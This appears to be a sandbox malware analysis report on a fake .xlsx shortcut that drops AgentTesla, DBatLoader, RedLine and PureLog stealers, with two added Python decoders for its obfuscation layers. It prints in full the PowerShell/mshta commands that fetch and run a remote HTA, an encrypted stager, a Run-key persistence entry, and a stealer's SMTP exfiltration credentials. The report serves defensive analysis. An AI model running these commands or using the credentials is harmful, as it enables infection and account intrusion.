
Windows Analysis Report
FT. 40FE CNY .xlsx.lnk

Overview

General Information

Sample name: FT. 40FE CNY .xlsx.lnk
Analysis ID: 1430751
MD5: 82fde340f187a517e0feced1d4972363
SHA1: 07740ba4e30a1dbc830451a0d05130ba1af28be9
SHA256: e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3
Tags: lnk

Detection

AgentTesla, DBatLoader, PureLog Stealer, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
Yara detected RedLine Stealer
.NET source code contains method to dynamically call methods (often used by packers)
Allocates memory in foreign processes
Drops PE files with a suspicious file extension
Found URL in windows shortcut file (LNK)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 5632 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7260 cmdline: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7688 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell - MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" - MD5: 04029E121A0CFA5991749937DD22A1D9)
          • uc.exe (PID: 8080 cmdline: "C:\Users\user\AppData\Roaming\uc.exe" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
            • cmd.exe (PID: 5360 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 3720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • extrac32.exe (PID: 1460 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
            • bwsiuvcU.pif (PID: 6340 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • svchost.exe (PID: 7612 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Ucvuiswb.PIF (PID: 1916 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
    • bwsiuvcU.pif (PID: 2196 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Ucvuiswb.PIF (PID: 2236 cmdline: "C:\Users\Public\Libraries\Ucvuiswb.PIF" MD5: E6AC6CA27AA2D60DC59A21AF1FFDB086)
    • bwsiuvcU.pif (PID: 2324 cmdline: C:\Users\Public\Libraries\bwsiuvcU.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
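The second-stage one-liner run by PID 7688 in the tree above decrypts and decompresses a further PowerShell script in memory and pipes it into `powershell -`. The script below is an added example, not part of the Joe Sandbox report and not the malware author's code: it pulls the parameters out of such a command line and replays the decryption in Python. It assumes the shape shown in the tree (a base64 key assigned to `.Key`, a base64 blob whose first 16 bytes are sliced as IV, `TransformFinalBlock($buf, 16, ...)`, then `GzipStream`). `STAGER_SAMPLE` is a constructed stand-in that keeps the report's variable names, key string and cipher settings but replaces the ciphertext with zero bytes; paste the full command line from the tree in its place to recover the real second stage. Two things to keep in mind while reading it: the key string decodes to 32 bytes, so this is AES-256, and the IV the script derives from the blob's first 16 bytes (all zero here) plays no role because the mode is ECB, so those bytes are simply skipped; and .NET's `PaddingMode.Zeros` leaves trailing zero bytes on the decrypted gzip stream, which the example hands to `gzip.decompress` untouched (Python tolerates zero padding after a gzip member, while stripping zeros blindly would corrupt a trailer whose ISIZE field ends in 0x00). `parse_stager()` needs only the standard library; `decrypt_stager()` needs the `cryptography` package.

```python
"""Recover the AES/gzip parameters of the second-stage PowerShell one-liner and,
with the `cryptography` package installed, the script it pipes into `powershell -`.

Added example, not Joe Sandbox output. STAGER_SAMPLE is a constructed command
line in the report's shape: the report's variable names, key string and cipher
settings, with the ciphertext replaced by 48 zero bytes (64 'A' characters).
"""
import base64
import gzip
import re

STAGER_SAMPLE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w 1 -ep Unrestricted -nop '
    "$OsFNkdw = '" + "A" * 64 + "';"                                  # constructed placeholder ciphertext
    "$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';"       # key string as in the report
    "$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';"
    "$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;"
    "$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;"
    "$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;"
    "$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);"
    "$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);"
    "$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;"
    "$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();"
    "$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);"
    "$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, "
    "([IO.Compression.CompressionMode]::Decompress);$ghWDGW | powershell -"
)

_B64_ASSIGN = re.compile(r"(\$\w+)\s*=\s*'([A-Za-z0-9+/=]+)'")


def parse_stager(cmdline: str) -> dict:
    """Extract key, mode, padding, IV slice and ciphertext from the one-liner."""
    assigns = dict(_B64_ASSIGN.findall(cmdline))          # $var -> base64 text
    key_ref = re.search(r"\.Key\s*=\s*\[System\.Convert\]::FromBase64String\((\$\w+)\)", cmdline)
    if not key_ref or key_ref.group(1) not in assigns:
        raise ValueError("no base64 key assignment found")
    key_var = key_ref.group(1)
    # The other (longest) base64 literal is the IV-prefixed ciphertext.
    data_vars = [v for v in assigns if v != key_var]
    if not data_vars:
        raise ValueError("no base64 payload assignment found")
    data = base64.b64decode(assigns[max(data_vars, key=lambda v: len(assigns[v]))])
    # TransformFinalBlock($buf, <offset>, ...) says how many leading bytes are
    # treated as IV; the report's command line skips 16.
    skip = re.search(r"TransformFinalBlock\(\s*\$\w+\s*,\s*(\d+)\s*,", cmdline)
    skip = int(skip.group(1)) if skip else 0
    mode = re.search(r"CipherMode\]::(\w+)", cmdline)
    padding = re.search(r"PaddingMode\]::(\w+)", cmdline)
    policy = re.search(r"-e(?:p|xecutionpolicy)\s+(\w+)", cmdline, re.I)
    key = base64.b64decode(assigns[key_var])
    return {
        "key": key,
        "key_bits": len(key) * 8,
        "mode": mode.group(1) if mode else None,
        "padding": padding.group(1) if padding else None,
        "iv": data[:skip],
        "ciphertext": data[skip:],
        "gzip": "GzipStream" in cmdline,
        "execution_policy": policy.group(1) if policy else None,
    }


def decrypt_stager(info: dict) -> str:
    """Replay the decryption: AES-ECB (IV unused), zero padding kept, gunzip, UTF-8."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes  # pip install cryptography
    if info["mode"] != "ECB":
        raise NotImplementedError(f"mode {info['mode']!r} is not handled by this example")
    if len(info["ciphertext"]) % 16:
        raise ValueError("ciphertext length is not a multiple of the AES block size")
    dec = Cipher(algorithms.AES(info["key"]), modes.ECB()).decryptor()
    plain = dec.update(info["ciphertext"]) + dec.finalize()
    # PaddingMode.Zeros leaves trailing zero bytes in place. Do not rstrip them:
    # the gzip trailer's ISIZE field may end in 0x00; Python's gzip module skips
    # zero padding after a member by itself.
    if info["gzip"]:
        plain = gzip.decompress(plain)
    return plain.decode("utf-8")


if __name__ == "__main__":
    info = parse_stager(STAGER_SAMPLE)
    print(f"AES-{info['key_bits']} {info['mode']}, padding={info['padding']}, "
          f"execution policy={info['execution_policy']}")
    print("key:", info["key"])
    print("iv bytes (ignored in ECB):", info["iv"].hex())
    print("ciphertext bytes:", len(info["ciphertext"]))
```

Running `parse_stager` on the report's own command line is enough for triage (key, mode, policy and payload size come out without any decryption); `decrypt_stager` is for recovering the script that `$ghWDGW | powershell -` executes, which Joe Sandbox captured only indirectly through the AMSI log and the dropped `uc.exe`.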
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Extracted AgentTesla configuration: {"Exfil Mode": "SMTP", "Host": "mail.irmaklarpaslanmaz.com.trB", "Username": "muhasebe@irmaklarpaslanmaz.com.tr", "Password": "MH5473588PmZ&"}
Source | Rule | Description | Author | Strings
C:\Users\Public\Libraries\UcvuiswbO.bat | MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5b:$s2: :~41,1%%
  • 0x67:$s2: :~47,1%%
  • 0x73:$s2: :~6,1%%
  • 0x7e:$s2: :~53,1%%
  • 0x8a:$s2: :~1,1%
  • 0x9b:$s2: :~10,1%%
  • 0xa7:$s2: :~39,1%%
  • 0xb3:$s2: :~16,1%%
  • 0xbf:$s2: :~13,1%%
  • 0xcb:$s2: :~25,1%%
  • 0xd7:$s2: :~53,1%%
  • 0xe3:$s2: :~42,1%%
  • 0xef:$s2: :~22,1%%
  • 0xfb:$s2: :~18,1%%
  • 0x107:$s2: :~48,1%%
  • 0x113:$s2: :~51,1%%
  • 0x11f:$s2: :~2,1%%
  • 0x12a:$s2: :~61,1%%
  • 0x136:$s2: :~9,1%%
  • 0x141:$s2: :~19,1%%
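The `:~N,1%` strings that MALWARE_BAT_KoadicBAT keys on are cmd.exe substring expansions: the batch file sets one variable to an alphabet and assembles the command it really runs from single-character slices, so the rule's strings are the obfuscation pattern itself and a hit is best confirmed by decoding the file. The decoder below is an added example, not part of the report or of the Koadic project. The report does not reproduce the .bat's contents, so `SAMPLE_BAT` is a constructed file in the same style (an `@cls&@set` preamble and a 4-character variable name, which is what the 12-byte spacing of the matched offsets suggests) and the command it decodes to is mine, not the sample's. It implements `%VAR:~start,len%` and `%VAR:~start%` with cmd.exe's negative-index semantics plus plain `%VAR%`; unresolved names are left in place rather than expanded to nothing, as cmd.exe would do inside a script, so they stay visible to the analyst.

```python
"""Resolve %VAR:~N,1% substring obfuscation in a batch dropper.

Added example, not from the report or the Koadic project. SAMPLE_BAT is a
constructed file in the style of the matched strings; its decoded command
is the example's own, not the analysed sample's.
"""
import re

# Constructed sample: the alphabet variable supplies a-z, space, '/', '.', ':', '\', '-'.
SAMPLE_BAT = r"""@echo off&@cls&@set zqpx=abcdefghijklmnopqrstuvwxyz /.:\-
%zqpx:~2,1%%zqpx:~12,1%%zqpx:~3,1%%zqpx:~26,1%%zqpx:~27,1%%zqpx:~2,1%%zqpx:~26,1%%zqpx:~4,1%%zqpx:~2,1%%zqpx:~7,1%%zqpx:~14,1%%zqpx:~26,1%%zqpx:~7,1%%zqpx:~4,1%%zqpx:~11,1%%zqpx:~11,1%%zqpx:~14,1%
"""

# `set NAME=value` or `set "NAME=value"`, optionally prefixed with @ and chained after & or |.
_SET = re.compile(r'(?:^|[&|])\s*@?\s*set\s+(?:"(\w+)=([^"\r\n]*)"|(\w+)=([^&\r\n]*))', re.I | re.M)
_SLICE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")   # %VAR:~start[,len]%
_PLAIN = re.compile(r"%(\w+)%")                          # %VAR%


def extract_vars(text: str) -> dict:
    """Collect the variables the batch file defines (names are case-insensitive in cmd)."""
    env = {}
    for m in _SET.finditer(text):
        name = m.group(1) or m.group(3)
        value = m.group(2) if m.group(1) else m.group(4)
        env[name.lower()] = value
    return env


def _substring(value: str, start: int, length):
    """cmd.exe %VAR:~start,len% semantics: negative start counts from the end,
    negative len is an offset from the end, missing len runs to the end."""
    n = len(value)
    s = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[s:]
    e = s + length if length >= 0 else n + length
    return value[s:e]


def expand(line: str, env: dict) -> str:
    """Expand slice and plain references on one line; unknown names are kept verbatim."""
    def slice_repl(m):
        name = m.group(1).lower()
        if name not in env:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return _substring(env[name], int(m.group(2)), length)

    def plain_repl(m):
        return env.get(m.group(1).lower(), m.group(0))

    return _PLAIN.sub(plain_repl, _SLICE.sub(slice_repl, line))


def decode_batch(text: str) -> list:
    """Return the batch file's lines with every %VAR...% reference resolved."""
    env = extract_vars(text)
    return [expand(line, env) for line in text.splitlines()]


if __name__ == "__main__":
    for line in decode_batch(SAMPLE_BAT):
        print(line)
```

Real droppers of this kind usually define several variables and spread the `set` lines among junk commands; since `extract_vars` scans the whole file before expanding, order does not matter, and anything that still contains `%` after decoding is either a reference to a variable set at runtime or a second layer that needs another pass.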
Source | Rule | Description | Author | Strings
0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000017.00000002.1639938993.00000000004A0000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000017.00000002.1682459055.00000000409C0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
(61 further entries not shown)
Source | Rule | Description | Author | Strings
27.3.bwsiuvcU.pif.3bd8fed0.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
23.2.bwsiuvcU.pif.400000.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
23.2.bwsiuvcU.pif.400000.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
                  • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
                  • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
                  • 0x1300:$s3: 83 EC 38 53 B0 EF 88 44 24 2B 88 44 24 2F B0 74 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
                  • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
                  • 0x1fdd0:$s5: delete[]
                  • 0x1f288:$s6: constructor or from DllMain.
25.1.bwsiuvcU.pif.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(72 further entries not shown)
Source | Rule | Description | Author | Strings
amsi64_7800.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                    • 0xc049:$b1: ::WriteAllBytes(
                    • 0xbcbc:$s1: -join
                    • 0x5468:$s4: +=
                    • 0x552a:$s4: +=
                    • 0x9751:$s4: +=
                    • 0xb86e:$s4: +=
                    • 0xbb58:$s4: +=
                    • 0xbc9e:$s4: +=
                    • 0xe383:$s4: +=
                    • 0xe403:$s4: +=
                    • 0xe4c9:$s4: +=
                    • 0xe549:$s4: +=
                    • 0xe71f:$s4: +=
                    • 0xe7a3:$s4: +=
                    • 0xc86c:$e4: Get-WmiObject
                    • 0xca5b:$e4: Get-Process
                    • 0xcab3:$e4: Start-Process

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = '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';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\bwsiuvcU.pif, NewProcessName: C:\Users\Public\Libraries\bwsiuvcU.pif, OriginalFileName: C:\Users\Public\Libraries\bwsiuvcU.pif, ParentCommandLine: "C:\Users\user\AppData\Roaming\uc.exe" , ParentImage: C:\Users\user\AppData\Roaming\uc.exe, ParentProcessId: 8080, ParentProcessName: uc.exe, ProcessCommandLine: C:\Users\Public\Libraries\bwsiuvcU.pif, ProcessId: 6340, ProcessName: bwsiuvcU.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Ucvuiswb.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\uc.exe, ProcessId: 8080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ucvuiswb
Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, CommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5632, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta, ProcessId: 7260, ProcessName: mshta.exe
